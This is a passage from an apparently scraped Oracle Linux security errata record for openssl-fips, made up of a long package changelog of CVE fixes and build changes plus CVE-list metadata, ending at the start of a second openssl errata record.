(#814185)\n[1.0.0-23]\n- fix problem with the SGC restart patch that might terminate handshake\n incorrectly\n- fix for CVE-2012-0884 - MMA weakness in CMS and PKCS#7 code (#802725)\n- fix for CVE-2012-1165 - NULL read dereference on bad MIME headers (#802489)\n[1.0.0-22]\n- fix incorrect encryption of unaligned chunks in CFB, OFB and CTR modes\n[1.0.0-21]\n- fix for CVE-2011-4108 & CVE-2012-0050 - DTLS plaintext recovery\n vulnerability and additional DTLS fixes (#771770)\n- fix for CVE-2011-4576 - uninitialized SSL 3.0 padding (#771775)\n- fix for CVE-2011-4577 - possible DoS through malformed RFC 3779 data (#771778)\n- fix for CVE-2011-4619 - SGC restart DoS attack (#771780)\n[1.0.0-20]\n- fix x86cpuid.pl - patch by Paolo Bonzini\n[1.0.0-19]\n- add known answer test for SHA2 algorithms\n[1.0.0-18]\n- fix missing initialization of a variable in the CHIL engine (#740188)\n[1.0.0-17]\n- initialize the X509_STORE_CTX properly for CRL lookups - CVE-2011-3207\n (#736087)\n[1.0.0-16]\n- merge the optimizations for AES-NI, SHA1, and RC4 from the intelx\n engine to the internal implementations\n[1.0.0-15]\n- better documentation of the available digests in apps (#693858)\n- backported CHIL engine fixes (#693863)\n- allow testing build without downstream patches (#708511)\n- enable partial RELRO when linking (#723994)\n- add intelx engine with improved performance on new Intel CPUs\n- add OPENSSL_DISABLE_AES_NI environment variable which disables\n the AES-NI support (does not affect the intelx engine)\n[1.0.0-14]\n- use the AES-NI engine in the FIPS mode\n[1.0.0-11]\n- add API necessary for CAVS testing of the new DSA parameter generation\n[1.0.0-10]\n- fix OCSP stapling vulnerability - CVE-2011-0014 (#676063)\n- correct the README.FIPS document\n[1.0.0-8]\n- add -x931 parameter to openssl genrsa command to use the ANSI X9.31\n key generation method\n- use FIPS-186-3 method for DSA parameter generation\n- add OPENSSL_FIPS_NON_APPROVED_MD5_ALLOW environment variable\n to allow using MD5 when the system is in the maintenance state\n even if the /proc fips flag is on\n- make openssl pkcs12 command work by default in the FIPS mode\n[1.0.0-7]\n- listen on ipv6 wildcard in s_server so we accept connections\n from both ipv4 and ipv6 (#601612)\n- fix openssl speed command so it can be used in the FIPS mode\n with FIPS allowed ciphers (#619762)\n[1.0.0-6]\n- disable code for SSL_OP_NETSCAPE_REUSE_CIPHER_CHANGE_BUG - CVE-2010-3864\n (#649304)\n[1.0.0-5]\n- fix race in extension parsing code - CVE-2010-3864 (#649304)\n[1.0.0-4]\n- openssl man page fix (#609484)\n[1.0.0-3]\n- fix wrong ASN.1 definition of OriginatorInfo - CVE-2010-0742 (#598738)\n- fix information leak in rsa_verify_recover - CVE-2010-1633 (#598732)\n[1.0.0-2]\n- make CA dir readable - the private keys are in private subdir (#584810)\n- a few fixes from upstream CVS\n- make X509_NAME_hash_old work in FIPS mode (#568395)\n[1.0.0-1]\n- update to final 1.0.0 upstream release\n[1.0.0-0.22.beta5]\n- make TLS work in the FIPS mode\n[1.0.0-0.21.beta5]\n- gracefully handle zero length in assembler implementations of\n OPENSSL_cleanse (#564029)\n- do not fail in s_server if client hostname not resolvable (#561260)\n[1.0.0-0.20.beta5]\n- new upstream release\n[1.0.0-0.19.beta4]\n- fix CVE-2009-4355 - leak in applications incorrectly calling\n CRYPTO_free_all_ex_data() before application exit (#546707)\n- upstream fix for future TLS protocol version handling\n[1.0.0-0.18.beta4]\n- add support for Intel AES-NI\n[1.0.0-0.17.beta4]\n- upstream fix compression handling on session resumption\n- various null checks and other small fixes from upstream\n- upstream changes for the renegotiation info according to the latest draft\n[1.0.0-0.16.beta4]\n- fix non-fips mingw build (patch by Kalev Lember)\n- add IPV6 fix for DTLS\n[1.0.0-0.15.beta4]\n- add better error reporting for the unsafe renegotiation\n[1.0.0-0.14.beta4]\n- fix build on s390x\n[1.0.0-0.13.beta4]\n- disable enforcement of the renegotiation extension on the client (#537962)\n- add fixes from the current upstream snapshot\n[1.0.0-0.12.beta4]\n- keep the beta status in version number at 3 so we do not have to rebuild\n openssh and possibly other dependencies with too strict version check\n[1.0.0-0.11.beta4]\n- update to new upstream version, no soname bump needed\n- fix CVE-2009-3555 - note that the fix is bypassed if SSL_OP_ALL is used\n so the compatibility with unfixed clients is not broken. The\n protocol extension is also not final.\n[1.0.0-0.10.beta3]\n- fix use of freed memory if SSL_CTX_free() is called before\n SSL_free() (#521342)\n[1.0.0-0.9.beta3]\n- fix typo in DTLS1 code (#527015)\n- fix leak in error handling of d2i_SSL_SESSION()\n[1.0.0-0.8.beta3]\n- fix RSA and DSA FIPS selftests\n- reenable fixed x86_64 camellia assembler code (#521127)\n[1.0.0-0.7.beta3]\n- temporarily disable x86_64 camellia assembler code (#521127)\n[1.0.0-0.6.beta3]\n- fix openssl dgst -dss1 (#520152)\n[1.0.0-0.5.beta3]\n- drop the compat symlink hacks\n[1.0.0-0.4.beta3]\n- constify SSL_CIPHER_description()\n[1.0.0-0.3.beta3]\n- fix WWW:Curl:Easy reference in tsget\n[1.0.0-0.2.beta3]\n- enable MD-2\n[1.0.0-0.1.beta3]\n- update to new major upstream release\n[0.9.8k-7]\n- Rebuilt for https://fedoraproject.org/wiki/Fedora_12_Mass_Rebuild\n* Wed Jul 22 2009 Bill Nottingham \n- do not build special 'optimized' versions for i686, as that's the base\n arch in Fedora now\n[0.9.8k-6]\n- abort if selftests failed and random number generator is polled\n- mention EVP_aes and EVP_sha2xx routines in the manpages\n- add README.FIPS\n- make CA dir absolute path (#445344)\n- change default length for RSA key generation to 2048 (#484101)\n[0.9.8k-5]\n- fix CVE-2009-1377 CVE-2009-1378 CVE-2009-1379\n (DTLS DoS problems) (#501253, #501254, #501572)\n[0.9.8k-4]\n- support compatibility DTLS mode for CISCO AnyConnect (#464629)\n[0.9.8k-3]\n- correct the SHLIB_VERSION define\n[0.9.8k-2]\n- add support for multiple CRLs with same subject\n- load only dynamic engine support in FIPS mode\n[0.9.8k-1]\n- update to new upstream release (minor bug fixes, security\n fixes and machine code optimizations only)\n[0.9.8j-10]\n- move libraries to /usr/lib (#239375)\n[0.9.8j-9]\n- add a static subpackage\n[0.9.8j-8]\n- Rebuilt for https://fedoraproject.org/wiki/Fedora_11_Mass_Rebuild\n[0.9.8j-7]\n- must also verify checksum of libssl.so in the FIPS mode\n- obtain the seed for FIPS rng directly from the kernel device\n- drop the temporary symlinks\n[0.9.8j-6]\n- drop the temporary triggerpostun and symlinking in post\n- fix the pkgconfig files and drop the unnecessary buildrequires\n on pkgconfig as it is a rpmbuild dependency (#481419)\n[0.9.8j-5]\n- add temporary triggerpostun to reinstate the symlinks\n[0.9.8j-4]\n- no pairwise key tests in non-fips mode (#479817)\n[0.9.8j-3]\n- even more robust test for the temporary symlinks\n[0.9.8j-2]\n- try to ensure the temporary symlinks exist\n[0.9.8j-1]\n- new upstream version with necessary soname bump (#455753)\n- temporarily provide symlink to old soname to make it possible to rebuild\n the dependent packages in rawhide\n- add eap-fast support (#428181)\n- add possibility to disable zlib by setting\n- add fips mode support for testing purposes\n- do not null dereference on some invalid smime files\n- add buildrequires pkgconfig (#479493)\n[0.9.8g-11]\n- do not add tls extensions to server hello for SSLv3 either\n[0.9.8g-10]\n- move root CA bundle to ca-certificates package\n[0.9.8g-9]\n- fix CVE-2008-0891 - server name extension crash (#448492)\n- fix CVE-2008-1672 - server key exchange message omit crash (#448495)\n[0.9.8g-8]\n- super-H arch support\n- drop workaround for bug 199604 as it should be fixed in gcc-4.3\n[0.9.8g-7]\n- sparc handling\n[0.9.8g-6]\n- update to new root CA bundle from mozilla.org (r1.45)\n[0.9.8g-5]\n- Autorebuild for GCC 4.3\n[0.9.8g-4]\n- merge review fixes (#226220)\n- adjust the SHLIB_VERSION_NUMBER to reflect library name (#429846)\n[0.9.8g-3]\n- set default paths when no explicit paths are set (#418771)\n- do not add tls extensions to client hello for SSLv3 (#422081)\n[0.9.8g-2]\n- enable some new crypto algorithms and features\n- add some more important bug fixes from openssl CVS\n[0.9.8g-1]\n- update to latest upstream release, SONAME bumped to 7\n[0.9.8b-17]\n- update to new CA bundle from mozilla.org\n[0.9.8b-16]\n- fix CVE-2007-5135 - off-by-one in SSL_get_shared_ciphers (#309801)\n- fix CVE-2007-4995 - out of order DTLS fragments buffer overflow (#321191)\n- add alpha sub-archs (#296031)\n[0.9.8b-15]\n- rebuild\n[0.9.8b-14]\n- use localhost in testsuite, hopefully fixes slow build in koji\n- CVE-2007-3108 - fix side channel attack on private keys (#250577)\n- make ssl session cache id matching strict (#233599)\n[0.9.8b-13]\n- allow building on ARM architectures (#245417)\n- use reference timestamps to prevent multilib conflicts (#218064)\n- -devel package must require pkgconfig (#241031)\n[0.9.8b-12]\n- detect duplicates in add_dir properly (#206346)\n[0.9.8b-11]\n- the previous change still didn't make X509_NAME_cmp transitive\n[0.9.8b-10]\n- make X509_NAME_cmp transitive otherwise certificate lookup\n is broken (#216050)\n[0.9.8b-9]\n- aliasing bug in engine loading, patch by IBM (#213216)\n[0.9.8b-8]\n- CVE-2006-2940 fix was incorrect (#208744)\n[0.9.8b-7]\n- fix CVE-2006-2937 - mishandled error on ASN.1 parsing (#207276)\n- fix CVE-2006-2940 - parasitic public keys DoS (#207274)\n- fix CVE-2006-3738 - buffer overflow in SSL_get_shared_ciphers (#206940)\n- fix CVE-2006-4343 - sslv2 client DoS (#206940)\n[0.9.8b-6]\n- fix CVE-2006-4339 - prevent attack on PKCS#1 v1.5 signatures (#205180)\n[0.9.8b-5]\n- set buffering to none on stdio/stdout FILE when bufsize is set (#200580)\n patch by IBM\n[0.9.8b-4.1]\n- rebuild with new binutils (#200330)\n[0.9.8b-4]\n- add a temporary workaround for sha512 test failure on s390 (#199604)\n* Thu Jul 20 2006 Tomas Mraz \n- add ipv6 support to s_client and s_server (by Jan Pazdziora) (#198737)\n- add patches for BN threadsafety, AES cache collision attack hazard fix and\n pkcs7 code memleak fix from upstream CVS\n[0.9.8b-3.1]\n- rebuild\n[0.9.8b-3]\n- dropped libica and ica engine from build\n* Wed Jun 21 2006 Joe Orton \n- update to new CA bundle from mozilla.org; adds CA certificates\n from netlock.hu and startcom.org\n[0.9.8b-2]\n- fixed a few rpmlint warnings\n- better fix for #173399 from upstream\n- upstream fix for pkcs12\n[0.9.8b-1]\n- upgrade to new version, stays ABI compatible\n- there is no more linux/config.h (it was empty anyway)\n[0.9.8a-6]\n- fix stale open handles in libica (#177155)\n- fix build if 'rand' or 'passwd' in buildroot path (#178782)\n- initialize VIA Padlock engine (#186857)\n[0.9.8a-5.2]\n- bump again for double-long bug on ppc(64)\n[0.9.8a-5.1]\n- rebuilt for new gcc4.1 snapshot and glibc changes\n[0.9.8a-5]\n- don't include SSL_OP_NETSCAPE_REUSE_CIPHER_CHANGE_BUG\n in SSL_OP_ALL (#175779)\n* Fri Dec 09 2005 Jesse Keating \n- rebuilt\n[0.9.8a-4]\n- fix build (-lcrypto was erroneusly dropped) of the updated libica\n- updated ICA engine to 1.3.6-rc3\n[0.9.8a-3]\n- disable builtin compression methods for now until they work\n properly (#173399)\n[0.9.8a-2]\n- don't set -rpath for openssl binary\n[0.9.8a-1]\n- new upstream version\n- patches partially renumbered\n[0.9.7f-11]\n- updated IBM ICA engine library and patch to latest upstream version\n[0.9.7f-10]\n- fix CAN-2005-2969 - remove SSL_OP_MSIE_SSLV2_RSA_PADDING which\n disables the countermeasure against man in the middle attack in SSLv2\n (#169863)\n- use sha1 as default for CA and cert requests - CAN-2005-2946 (#169803)\n[0.9.7f-9]\n- add *.so.soversion as symlinks in /lib (#165264)\n- remove unpackaged symlinks (#159595)\n- fixes from upstream (constant time fixes for DSA,\n bn assembler div on ppc arch, initialize memory on realloc)\n[0.9.7f-8]\n- Updated ICA engine IBM patch to latest upstream version.\n[0.9.7f-7]\n- fix CAN-2005-0109 - use constant time/memory access mod_exp\n so bits of private key aren't leaked by cache eviction (#157631)\n- a few more fixes from upstream 0.9.7g\n[0.9.7f-6]\n- use poll instead of select in rand (#128285)\n- fix Makefile.certificate to point to /etc/pki/tls\n- change the default string mask in ASN1 to PrintableString+UTF8String\n[0.9.7f-5]\n- update to revision 1.37 of Mozilla CA bundle\n[0.9.7f-4]\n- move certificates to _sysconfdir/pki/tls (#143392)\n- move CA directories to _sysconfdir/pki/CA\n- patch the CA script and the default config so it points to the\n CA directories\n[0.9.7f-3]\n- uninitialized variable mustn't be used as input in inline\n assembly\n- reenable the x86_64 assembly again\n[0.9.7f-2]\n- add back RC4_CHAR on ia64 and x86_64 so the ABI isn't broken\n- disable broken bignum assembly on x86_64\n[0.9.7f-1]\n- reenable optimizations on ppc64 and assembly code on ia64\n- upgrade to new upstream version (no soname bump needed)\n- disable thread test - it was testing the backport of the\n RSA blinding - no longer needed\n- added support for changing serial number to\n Makefile.certificate (#151188)\n- make ca-bundle.crt a config file (#118903)\n[0.9.7e-3]\n- libcrypto shouldn't depend on libkrb5 (#135961)\n[0.9.7e-2]\n- rebuild\n[0.9.7e-1]\n- new upstream source, updated patches\n- added patch so we are hopefully ABI compatible with upcoming\n 0.9.7f\n* Thu Feb 10 2005 Tomas Mraz \n- Support UTF-8 charset in the Makefile.certificate (#134944)\n- Added cmp to BuildPrereq\n[0.9.7a-46]\n- generate new ca-bundle.crt from Mozilla certdata.txt (revision 1.32)\n[0.9.7a-45]\n- Fixed and updated libica-1.3.4-urandom.patch patch (#122967)\n[0.9.7a-44]\n- rebuild\n[0.9.7a-43]\n- rebuild\n[0.9.7a-42]\n- rebuild\n[0.9.7a-41]\n- remove der_chop, as upstream cvs has done (CAN-2004-0975, #140040)\n[0.9.7a-40]\n- Include latest libica version with important bugfixes\n* Tue Jun 15 2004 Elliot Lee \n- rebuilt\n[0.9.7a-38]\n- Updated ICA engine IBM patch to latest upstream version.\n[0.9.7a-37]\n- build for linux-alpha-gcc instead of alpha-gcc on alpha (Jeff Garzik)\n[0.9.7a-36]\n- handle %{_arch}=i486/i586/i686/athlon cases in the intermediate\n header (#124303)\n[0.9.7a-35]\n- add security fixes for CAN-2004-0079, CAN-2004-0112\n* Tue Mar 16 2004 Phil Knirsch \n- Fixed libica filespec.\n[0.9.7a-34]\n- ppc/ppc64 define __powerpc__/__powerpc64__, not __ppc__/__ppc64__, fix\n the intermediate header\n[0.9.7a-33]\n- add an intermediate \n which points to the right\n arch-specific opensslconf.h on multilib arches\n* Tue Mar 02 2004 Elliot Lee \n- rebuilt\n[0.9.7a-32]\n- Updated libica to latest upstream version 1.3.5.\n[0.9.7a-31]\n- Update ICA crypto engine patch from IBM to latest version.\n* Fri Feb 13 2004 Elliot Lee \n- rebuilt\n[0.9.7a-29]\n- rebuilt\n[0.9.7a-28]\n- Fixed libica build.\n* Wed Feb 04 2004 Nalin Dahyabhai \n- add '-ldl' to link flags added for Linux-on-ARM (#99313)\n[0.9.7a-27]\n- updated ca-bundle.crt: removed expired GeoTrust roots, added\n freessl.com root, removed trustcenter.de Class 0 root\n[0.9.7a-26]\n- Fix link line for libssl (bug #111154).\n[0.9.7a-25]\n- add dependency on zlib-devel for the -devel package, which depends on zlib\n symbols because we enable zlib for libssl (#102962)\n[0.9.7a-24]\n- Use /dev/urandom instead of PRNG for libica.\n- Apply libica-1.3.5 fix for /dev/urandom in icalinux.c\n- Use latest ICA engine patch from IBM.\n[0.9.7a-22.1]\n- rebuild\n[0.9.7a-22]\n- rebuild (22 wasn't actually built, fun eh?)\n[0.9.7a-23]\n- re-disable optimizations on ppc64\n* Tue Sep 30 2003 Joe Orton \n- add a_mbstr.c fix for 64-bit platforms from CVS\n[0.9.7a-22]\n- add -Wa,--noexecstack to RPM_OPT_FLAGS so that assembled modules get tagged\n as not needing executable stacks\n[0.9.7a-21]\n- rebuild\n* Thu Sep 25 2003 Nalin Dahyabhai \n- re-enable optimizations on ppc64\n* Thu Sep 25 2003 Nalin Dahyabhai \n- remove exclusivearch\n[0.9.7a-20]\n- only parse a client cert if one was requested\n- temporarily exclusivearch for %{ix86}\n* Tue Sep 23 2003 Nalin Dahyabhai \n- add security fixes for protocol parsing bugs (CAN-2003-0543, CAN-2003-0544)\n and heap corruption (CAN-2003-0545)\n- update RHNS-CA-CERT files\n- ease back on the number of threads used in the threading test\n[0.9.7a-19]\n- rebuild to fix gzipped file md5sums (#91211)\n[0.9.7a-18]\n- Updated libica to version 1.3.4.\n[0.9.7a-17]\n- rebuild\n[0.9.7a-10.9]\n- free the kssl_ctx structure when we free an SSL structure (#99066)\n[0.9.7a-16]\n- rebuild\n[0.9.7a-15]\n- lower thread test count on s390x\n[0.9.7a-14]\n- rebuild\n[0.9.7a-13]\n- disable assembly on arches where it seems to conflict with threading\n[0.9.7a-12]\n- Updated libica to latest upstream version 1.3.0\n[0.9.7a-9.9]\n- rebuild\n[0.9.7a-11]\n- rebuild\n[0.9.7a-10]\n- ubsec: don't stomp on output data which might also be input data\n[0.9.7a-9]\n- temporarily disable optimizations on ppc64\n* Mon Jun 09 2003 Nalin Dahyabhai \n- backport fix for engine-used-for-everything from 0.9.7b\n- backport fix for prng not being seeded causing problems, also from 0.9.7b\n- add a check at build-time to ensure that RSA is thread-safe\n- keep perlpath from stomping on the libica configure scripts\n* Fri Jun 06 2003 Nalin Dahyabhai \n- thread-safety fix for RSA blinding\n[0.9.7a-8]\n- rebuilt\n[0.9.7a-7]\n- Added libica-1.2 to openssl (featurerequest).\n[0.9.7a-6]\n- fix building with incorrect flags on ppc64\n[0.9.7a-5]\n- add patch to harden against Klima-Pokorny-Rosa extension of Bleichenbacher's\n attack (CAN-2003-0131)\n[ 0.9.7a-4]\n- add patch to enable RSA blinding by default, closing a timing attack\n (CAN-2003-0147)\n[0.9.7a-3]\n- disable use of BN assembly module on x86_64, but continue to allow inline\n assembly (#83403)\n[0.9.7a-2]\n- disable EC algorithms\n[0.9.7a-1]\n- update to 0.9.7a\n[0.9.7-8]\n- add fix to guard against attempts to allocate negative amounts of memory\n- add patch for CAN-2003-0078, fixing a timing attack\n[0.9.7-7]\n- Add openssl-ppc64.patch\n[0.9.7-6]\n- EVP_DecryptInit should call EVP_CipherInit() instead of EVP_CipherInit_ex(),\n to get the right behavior when passed uninitialized context structures\n (#83766)\n- build with -mcpu=ev5 on alpha family (#83828)\n* Wed Jan 22 2003 Tim Powers \n- rebuilt\n[0.9.7-4]\n- Added IBM hw crypto support patch.\n* Wed Jan 15 2003 Nalin Dahyabhai \n- add missing builddep on sed\n[0.9.7-3]\n- debloat\n- fix broken manpage symlinks\n[0.9.7-2]\n- fix double-free in 'openssl ca'\n[0.9.7-1]\n- update to 0.9.7 final\n[0.9.7-0]\n- update to 0.9.7 beta6 (DO NOT USE UNTIL UPDATED TO FINAL 0.9.7)\n* Wed Dec 11 2002 Nalin Dahyabhai \n- update to 0.9.7 beta5 (DO NOT USE UNTIL UPDATED TO FINAL 0.9.7)\n[0.9.6b-30]\n- add configuration stanza for x86_64 and use it on x86_64\n- build for linux-ppc on ppc\n- start running the self-tests again\n[0.9.6b-29hammer.3]\n- Merge fixes from previous hammer packages, including general x86-64 and\n multilib\n[0.9.6b-29]\n- rebuild\n[0.9.6b-28]\n- update asn patch to fix accidental reversal of a logic check\n[0.9.6b-27]\n- update asn patch to reduce chance that compiler optimization will remove\n one of the added tests\n[0.9.6b-26]\n- rebuild\n[0.9.6b-25]\n- add patch to fix ASN.1 vulnerabilities\n[0.9.6b-24]\n- add backport of Ben Laurie's patches for OpenSSL 0.9.6d\n[0.9.6b-23]\n- own {_datadir}/ssl/misc\n* Fri Jun 21 2002 Tim Powers \n- automated rebuild\n* Sun May 26 2002 Tim Powers \n- automated rebuild\n[0.9.6b-20]\n- free ride through the build system (whee!)\n[0.9.6b-19]\n- rebuild in new environment\n[0.9.6b-17, 0.9.6b-18]\n- merge RHL-specific bits into stronghold package, rename\n[stronghold-0.9.6c-2]\n- add support for Chrysalis Luna token\n* Tue Mar 26 2002 Gary Benson \n- disable AEP random number generation, other AEP fixes\n[0.9.6b-15]\n- only build subpackages on primary arches\n[0.9.6b-13]\n- on ia32, only disable use of assembler on i386\n- enable assembly on ia64\n[0.9.6b-11]\n- fix sparcv9 entry\n[stronghold-0.9.6c-1]\n- upgrade to 0.9.6c\n- bump BuildArch to i686 and enable assembler on all platforms\n- synchronise with shrimpy and rawhide\n- bump soversion to 3\n* Wed Oct 10 2001 Florian La Roche \n- delete BN_LLONG for s390x, patch from Oliver Paukstadt\n[0.9.6b-9]\n- update AEP driver patch\n* Mon Sep 10 2001 Nalin Dahyabhai \n- adjust RNG disabling patch to match version of patch from Broadcom\n[0.9.6b-8]\n- disable the RNG in the ubsec engine driver\n[0.9.6b-7]\n- tweaks to the ubsec engine driver\n[0.9.6b-6]\n- tweaks to the ubsec engine driver\n[0.9.6b-5]\n- update ubsec engine driver from Broadcom\n[0.9.6b-4]\n- move man pages back to %{_mandir}/man?/foo.?ssl from\n %{_mandir}/man?ssl/foo.?\n- add an [ engine ] section to the default configuration file\n* Thu Aug 09 2001 Nalin Dahyabhai \n- add a patch for selecting a default engine in SSL_library_init()\n[0.9.6b-3]\n- add patches for AEP hardware support\n- add patch to keep trying when we fail to load a cert from a file and\n there are more in the file\n- add missing prototype for ENGINE_ubsec() in engine_int.h\n[0.9.6b-2]\n- actually add hw_ubsec to the engine list\n* Tue Jul 17 2001 Nalin Dahyabhai \n- add in the hw_ubsec driver from CVS\n[0.9.6b-1]\n- update to 0.9.6b\n* Thu Jul 05 2001 Nalin Dahyabhai \n- move .so symlinks back to %{_libdir}\n* Tue Jul 03 2001 Nalin Dahyabhai \n- move shared libraries to /lib (#38410)\n* Mon Jun 25 2001 Nalin Dahyabhai \n- switch to engine code base\n* Mon Jun 18 2001 Nalin Dahyabhai \n- add a script for creating dummy certificates\n- move man pages from %{_mandir}/man?/foo.?ssl to %{_mandir}/man?ssl/foo.?\n* Thu Jun 07 2001 Florian La Roche \n- add s390x support\n* Fri Jun 01 2001 Nalin Dahyabhai \n- change two memcpy() calls to memmove()\n- don't define L_ENDIAN on alpha\n[stronghold-0.9.6a-1]\n- Add 'stronghold-' prefix to package names.\n- Obsolete standard openssl packages.\n* Wed May 16 2001 Joe Orton \n- Add BuildArch: i586 as per Nalin's advice.\n* Tue May 15 2001 Joe Orton \n- Enable assembler on ix86 (using new .tar.bz2 which does\n include the asm directories).\n* Tue May 15 2001 Nalin Dahyabhai \n- make subpackages depend on the main package\n* Tue May 01 2001 Nalin Dahyabhai \n- adjust the hobble script to not disturb symlinks in include/ (fix from\n Joe Orton)\n* Fri Apr 27 2001 Nalin Dahyabhai \n- drop the m2crypo patch we weren't using\n* Tue Apr 24 2001 Nalin Dahyabhai \n- configure using 'shared' as well\n* Sun Apr 08 2001 Nalin Dahyabhai \n- update to 0.9.6a\n- use the build-shared target to build shared libraries\n- bump the soversion to 2 because we're no longer compatible with\n our 0.9.5a packages or our 0.9.6 packages\n- drop the patch for making rsatest a no-op when rsa null support is used\n- put all man pages into \nssl instead of \n- break the m2crypto modules into a separate package\n* Tue Mar 13 2001 Nalin Dahyabhai \n- use BN_LLONG on s390\n* Mon Mar 12 2001 Nalin Dahyabhai \n- fix the s390 changes for 0.9.6 (isn't supposed to be marked as 64-bit)\n* Sat Mar 03 2001 Nalin Dahyabhai \n- move c_rehash to the perl subpackage, because it's a perl script now\n* Fri Mar 02 2001 Nalin Dahyabhai \n- update to 0.9.6\n- enable MD2\n- use the libcrypto.so and libssl.so targets to build shared libs with\n- bump the soversion to 1 because we're no longer compatible with any of\n the various 0.9.5a packages circulating around, which provide lib*.so.0\n* Wed Feb 28 2001 Florian La Roche \n- change hobble-openssl for disabling MD2 again\n* Tue Feb 27 2001 Nalin Dahyabhai \n- re-disable MD2 -- the EVP_MD_CTX structure would grow from 100 to 152\n bytes or so, causing EVP_DigestInit() to zero out stack variables in\n apps built against a version of the library without it\n* Mon Feb 26 2001 Nalin Dahyabhai \n- disable some inline assembly, which on x86 is Pentium-specific\n- re-enable MD2 (see http://www.ietf.org/ietf/IPR/RSA-MD-all)\n* Thu Feb 08 2001 Florian La Roche \n- fix s390 patch\n* Fri Dec 08 2000 Than Ngo \n- added support s390\n* Mon Nov 20 2000 Nalin Dahyabhai \n- remove -Wa,* and -m* compiler flags from the default Configure file (#20656)\n- add the CA.pl man page to the perl subpackage\n* Thu Nov 02 2000 Nalin Dahyabhai \n- always build with -mcpu=ev5 on alpha\n* Tue Oct 31 2000 Nalin Dahyabhai \n- add a symlink from cert.pem to ca-bundle.crt\n* Wed Oct 25 2000 Nalin Dahyabhai \n- add a ca-bundle file for packages like Samba to reference for CA certificates\n* Tue Oct 24 2000 Nalin Dahyabhai \n- remove libcrypto's crypt(), which doesn't handle md5crypt (#19295)\n* Mon Oct 02 2000 Nalin Dahyabhai \n- add unzip as a buildprereq (#17662)\n- update m2crypto to 0.05-snap4\n* Tue Sep 26 2000 Bill Nottingham \n- fix some issues in building when it's not installed\n* Wed Sep 06 2000 Nalin Dahyabhai \n- make sure the headers we include are the ones we built with (aaaaarrgh!)\n* Fri Sep 01 2000 Nalin Dahyabhai \n- add Richard Henderson's patch for BN on ia64\n- clean up the changelog\n* Tue Aug 29 2000 Nalin Dahyabhai \n- fix the building of python modules without openssl-devel already installed\n* Wed Aug 23 2000 Nalin Dahyabhai \n- byte-compile python extensions without the build-root\n- adjust the makefile to not remove temporary files (like .key files when\n building .csr files) by marking them as .PRECIOUS\n* Sat Aug 19 2000 Nalin Dahyabhai \n- break out python extensions into a subpackage\n* Mon Jul 17 2000 Nalin Dahyabhai \n- tweak the makefile some more\n* Tue Jul 11 2000 Nalin Dahyabhai \n- disable MD2 support\n* Thu Jul 06 2000 Nalin Dahyabhai \n- disable MDC2 support\n* Sun Jul 02 2000 Nalin Dahyabhai \n- tweak the disabling of RC5, IDEA support\n- tweak the makefile\n* Thu Jun 29 2000 Nalin Dahyabhai \n- strip binaries and libraries\n- rework certificate makefile to have the right parts for Apache\n* Wed Jun 28 2000 Nalin Dahyabhai \n- use %{_perl} instead of /usr/bin/perl\n- disable alpha until it passes its own test suite\n* Fri Jun 09 2000 Nalin Dahyabhai \n- move the passwd.1 man page out of the passwd package's way\n* Fri Jun 02 2000 Nalin Dahyabhai \n- update to 0.9.5a, modified for U.S.\n- add perl as a build-time requirement\n- move certificate makefile to another package\n- disable RC5, IDEA, RSA support\n- remove optimizations for now\n* Wed Mar 01 2000 Florian La Roche \n- Bero told me to move the Makefile into this package\n* Wed Mar 01 2000 Florian La Roche \n- add lib*.so symlinks to link dynamically against shared libs\n* Tue Feb 29 2000 Florian La Roche \n- update to 0.9.5\n- run ldconfig directly in post/postun\n- add FAQ\n* Sat Dec 18 1999 Bernhard Rosenkrdnzer \n- Fix build on non-x86 platforms\n* Fri Nov 12 1999 Bernhard Rosenkrdnzer \n- move /usr/share/ssl/* from -devel to main package\n* Tue Oct 26 1999 Bernhard Rosenkrdnzer \n- inital packaging\n- changes from base:\n - Move /usr/local/ssl to /usr/share/ssl for FHS compliance\n - handle RPM_OPT_FLAGS\nopenssl-1.0.1-beta2-rpmbuild.patch\nopenssl-0.9.8a-no-rpath.patch", "cvss3": {}, "published": "2015-04-02T00:00:00", "type": "oraclelinux", "title": "openssl-fips security update", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2003-0078", "CVE-2003-0131", "CVE-2003-0147", "CVE-2003-0543", "CVE-2003-0544", "CVE-2003-0545", "CVE-2004-0079", "CVE-2004-0112", "CVE-2004-0975", "CVE-2005-0109", "CVE-2005-2946", "CVE-2005-2969", "CVE-2006-2937", "CVE-2006-2940", "CVE-2006-3738", "CVE-2006-4339", "CVE-2006-4343", "CVE-2007-3108", "CVE-2007-4995", "CVE-2007-5135", "CVE-2008-0891", "CVE-2008-1672", "CVE-2009-1377", "CVE-2009-1378", "CVE-2009-1379", "CVE-2009-3555", "CVE-2009-4355", "CVE-2010-0742", "CVE-2010-1633", "CVE-2010-3864", "CVE-2010-5298", "CVE-2011-0014", "CVE-2011-3207", "CVE-2011-4108", "CVE-2011-4576", "CVE-2011-4577", "CVE-2011-4619", "CVE-2012-0050", "CVE-2012-0884", "CVE-2012-1165", "CVE-2012-2110", "CVE-2012-2333", "CVE-2012-4929", "CVE-2013-0166", "CVE-2013-0169", "CVE-2013-4353", "CVE-2013-6449", "CVE-2013-6450", "CVE-2014-0160", "CVE-2014-0195", "CVE-2014-0198", "CVE-2014-0221", "CVE-2014-0224", "CVE-2014-3470", "CVE-2015-0209", "CVE-2015-0286", "CVE-2015-0287", "CVE-2015-0288", "CVE-2015-0289", "CVE-2015-0292", "CVE-2015-0293"], "modified": "2015-04-02T00:00:00", "id": "ELSA-2015-3022", "href": "http://linux.oracle.com/errata/ELSA-2015-3022.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-07-30T06:24:33", "description": "[1.0.2k-16.0.1.el7_6.1]\n- Bump release for rebuild.\n[1.0.2k-16.1]\n- use SHA-256 in FIPS RSA pairwise key check\n- fix CVE-2018-5407 - EC signature local timing side-channel key extraction\n[1.0.2k-16]\n- fix CVE-2018-0495 - ROHNP - Key Extraction Side Channel on DSA, ECDSA\n- fix incorrect error message on FIPS DSA parameter generation (#1603597)\n[1.0.2k-14]\n- ppc64le is not multilib architecture (#1585004)\n[1.0.2k-13]\n- add S390x assembler updates\n- make CA name list comparison function case sensitive (#1548401)\n- fix CVE-2017-3735 - possible one byte overread with X.509 IPAdressFamily\n- fix CVE-2018-0732 - large prime DH DoS of TLS client\n- fix CVE-2018-0737 - RSA key generation cache timing vulnerability\n- fix CVE-2018-0739 - stack overflow parsing recursive ASN.1 structure\n[1.0.2k-12]\n- fix CVE-2017-3737 - incorrect handling of fatal error state\n- fix CVE-2017-3738 - AVX2 